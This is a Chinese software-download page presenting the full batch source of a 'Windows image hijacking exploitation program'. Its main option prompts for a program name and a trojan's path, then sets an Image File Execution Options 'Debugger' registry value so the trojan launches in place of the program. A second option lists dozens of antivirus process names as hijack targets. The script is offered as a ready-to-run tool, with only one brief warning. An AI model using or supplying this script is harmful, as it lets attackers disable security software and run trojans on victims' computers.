LISP病毒檢查程序(AutoCAD病毒專殺) 秋楓
5KB / 06-24
Windows安全檢查bat批處理腳本 V2016 綠色版
2KB / 10-01
批處理病毒清理助手VirusCleaner V1.3.2 bat版
9KB / 05-11
華夏病毒專殺集成bat版
11KB / 05-03
清除威金(logo_1,熊貓燒香)病毒最新變種工具
8KB / 05-02
jacksi(比較實用的工具批處理)
8KB / 05-02
Windows映像劫持利用程序bat版
8KB / 05-02
win2000服務(wù)器批量處理服務(wù)的bat
5KB / 05-17
win2003服務(wù)器批量處理服務(wù)的bat
5KB / 05-17
Autorun 病毒清除工具 CMD版
7KB / 09-16
-
-
-
-
華夏病毒專殺集成bat版 安全防毒 / 11KB
-
-
jacksi(比較實用的工具批處理) 安全防毒 / 8KB
-
Windows映像劫持利用程序bat版 安全防毒 / 8KB
-
-
-
Autorun 病毒清除工具 CMD版 安全防毒 / 7KB
詳情介紹
NT系統(tǒng)在試圖執(zhí)行一個從命令行調(diào)用的可執(zhí)行文件運行請求時,先會檢查運行程序是不是可執(zhí)行文件,如果是的話,再檢查格式的,然后就會檢查是否存在。。如果不存在的話,它會提示系統(tǒng)找不到文件或 者是“指定的路徑不正確等等。
@shift 1
@Echo Off
color f0
title Windows映像劫持利用程序-By Mice
:clearauto
cls
Echo.
Echo Windows映像劫持利用程序
Echo.
Echo 制作:Mice <a >Http://WwW.Mice33.Cn</a>
Echo.
Echo 映像脅持的基本原理:
Echo NT系統(tǒng)在試圖執(zhí)行一個從命令行調(diào)用的可執(zhí)行文件運行請求時,先會檢查運行程序是不是可執(zhí)行文件,如果是的話,再檢查格式的,然后就會檢查是否存在。。如果不存在的話,它會提示系統(tǒng)找不到文件或 者是“指定的路徑不正確等等。。
Echo.
Echo [1] 哈哈我來利用咯
Echo [2] 看看常用殺毒軟件進(jìn)程名稱
Echo [3] 修補漏洞
Echo [0] 退出
Echo.
Set /p clearslt= 請輸入您的選擇(1/2/3/0):
If "%clearslt%"=="" Goto clearauto
If "%clearslt%"=="1" Goto clearauto1
If "%clearslt%"=="2" Goto changyong
If "%clearslt%"=="3" Goto budong
If "%clearslt%"=="0" Exit
echo 請選擇編號
pause
Goto clearauto</span></p>
<p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:clearauto1
rem 定義文件名
set /p file1= 請輸入你要挾持的文件名(如avp.exe,rav,exe)
set /p file2= 請輸入你木馬的絕對路徑(如c:\windows\xx.exe)
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%] >mice.reg
regedit /s mice.reg & del /q mice.reg</span></p>
<p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%" /f /v "Debugger" /t reg_sz /d "%file2%"
del /q cy.txt
cls
Echo 添加成功.趕快把文件名改成%file1%來測試下吧.
pause>nul
Goto clearauto</span></p>
<p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:changyong
rem 常用軟件名
echo 常用殺毒軟件 >>cy.txt
echo avp.exe >>cy.txt
echo AgentSvr.exe >>cy.txt
echo CCenter.exe>>cy.txt
echo Rav.exe>>cy.txt
echo RavMonD.exe>>cy.txt
echo RavStub.exe>>cy.txt
echo RavTask.exe>>cy.txt
echo rfwcfg.exe>>cy.txt
echo rfwsrv.exe>>cy.txt
echo RsAgent.exe>>cy.txt
echo Rsaupd.exe>>cy.txt
echo runiep.exe>>cy.txt
echo SmartUp.exe>>cy.txt
echo FileDsty.exe>>cy.txt
echo RegClean.exe>>cy.txt
echo 360tray.exe>>cy.txt
echo 360Safe.exe>>cy.txt
echo 360rpt.exe>>cy.txt
echo kabaload.exe>>cy.txt
echo safelive.exe>>cy.txt
echo Ras.exe>>cy.txt
echo KASMain.exe>>cy.txt
echo KASTask.exe>>cy.txt
echo KAV32.exe>>cy.txt
echo KAVDX.exe>>cy.txt
echo KAVStart.exe>>cy.txt
echo KISLnchr.exe>>cy.txt
echo KMailMon.exe>>cy.txt
echo KMFilter.exe>>cy.txt
echo KPFW32.exe>>cy.txt
echo KPFW32X.exe>>cy.txt
echo KPFWSvc.exe>>cy.txt
echo KWatch9x.exe>>cy.txt
echo KWatch.exe>>cy.txt
echo KWatchX.exe>>cy.txt
echo TrojanDetector.exe>>cy.txt
echo UpLive.EXE.exe>>cy.txt
echo KVSrvXP.exe>>cy.txt
echo KvDetect.exe>>cy.txt
echo KRegEx.exe>>cy.txt
echo kvol.exe>>cy.txt
echo kvolself.exe>>cy.txt
echo kvupload.exe>>cy.txt
echo kvwsc.exe>>cy.txt
echo UIHost.exe>>cy.txt
echo IceSword.exe>>cy.txt
echo iparmo.exe>>cy.txt
echo mmsk.exe>>cy.txt
echo adam.exe>>cy.txt
echo MagicSet.exe>>cy.txt
echo PFWLiveUpdate.exe>>cy.txt
echo SREng.exe>>cy.txt
echo WoptiClean.exe>>cy.txt
echo scan32.exe>>cy.txt
echo shcfg32.exe>>cy.txt
echo mcconsol.exe>>cy.txt
echo HijackThis.exe>>cy.txt
echo mmqczj.exe>>cy.txt
echo Trojanwall.exe>>cy.txt
echo FTCleanerShell.exe>>cy.txt
echo loaddll.exe>>cy.txt
echo rfwProxy.exe>>cy.txt
echo KsLoader.exe>>cy.txt
echo KvfwMcl.exe>>cy.txt
echo autoruns.exe>>cy.txt
echo AppSvc32.exe>>cy.txt
echo ccSvcHst.exe>>cy.txt
echo isPwdSvc.exe>>cy.txt
echo symlcsvc.exe>>cy.txt
echo nod32kui.exe>>cy.txt
echo avgrssvc.exe>>cy.txt
echo RfwMain.exe>>cy.txt
echo KAVPFW.exe>>cy.txt
echo Iparmor.exe>>cy.txt
echo nod32krn.exe>>cy.txt
echo PFW.exe>>cy.txt
echo RavMon.exe>>cy.txt
echo KAVSetup.exe>>cy.txt
echo NAVSetup.exe>>cy.txt
echo SysSafe.exe>>cy.txt
echo QHSET.exe>>cy.txt
echo zxsweep.exe>>cy.txt
echo AvMonitor.exe>>cy.txt
echo UmxCfg.exe>>cy.txt
echo UmxFwHlp.exe>>cy.txt
echo UmxPol.exe>>cy.txt
echo UmxAgent.exe>>cy.txt
echo UmxAttachment.exe>>cy.txt
call cy.txt
Goto clearauto</span></p>
<p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:budong
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny administrators /full
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny system /full
Echo 修補成功.
pause>nul
Goto clearauto
警告:運行BAT源碼是一種危險的動作,如果你不熟悉,請不要嘗試!
下載地址
人氣BAT
相關(guān)文章
-
LISP病毒檢查程序(AutoCAD病毒專殺) 秋楓
本工具是針對AutoCad下頑固的acaddoc.lsp病毒編寫的清除工具,下載后雙擊運行vbs文件即可...
-
Windows安全檢查bat批處理腳本 V2016 綠色版
網(wǎng)友制作的一個Windows安全檢查工具,很方便的功能,對于學(xué)習(xí)bat的朋友也是一個參考資料...
-
批處理病毒清理助手VirusCleaner V1.3.2 bat版
可查殺常見U盤病毒、同名文件夾病毒、隨機(jī)名稱病毒?;謴?fù)被隱藏文件夾,修復(fù)映像劫持。一鍵結(jié)束非系統(tǒng)進(jìn)程、清理系統(tǒng)垃圾、自啟動項、任務(wù)計劃...
-
華夏病毒專殺集成bat版
本作品是結(jié)合了許多經(jīng)典的各種病毒專殺寫成的...
-
清除威金(logo_1,熊貓燒香)病毒最新變種工具
清除威金(logo_1,熊貓燒香)病毒最新變種工具,清除VIKING病毒最新變種工具...
-
jacksi(比較實用的工具批處理)
這里分享的是用bat寫的比較實用的工具,學(xué)習(xí)bat的朋友可以參考下...
下載聲明
☉ 解壓密碼:www.dbjr.com.cn 就是本站主域名,希望大家看清楚,[ 分享碼的獲取方法 ]可以參考這篇文章
☉ 推薦使用 [ 迅雷 ] 下載,使用 [ WinRAR v5 ] 以上版本解壓本站軟件。
☉ 如果這個軟件總是不能下載的請在評論中留言,我們會盡快修復(fù),謝謝!
☉ 下載本站資源,如果服務(wù)器暫不能下載請過一段時間重試!或者多試試幾個下載地址
☉ 如果遇到什么問題,請評論留言,我們定會解決問題,謝謝大家支持!
☉ 本站提供的一些商業(yè)軟件是供學(xué)習(xí)研究之用,如用于商業(yè)用途,請購買正版。
☉ 本站提供的Windows映像劫持利用程序bat版資源來源互聯(lián)網(wǎng),版權(quán)歸該下載資源的合法擁有者所有。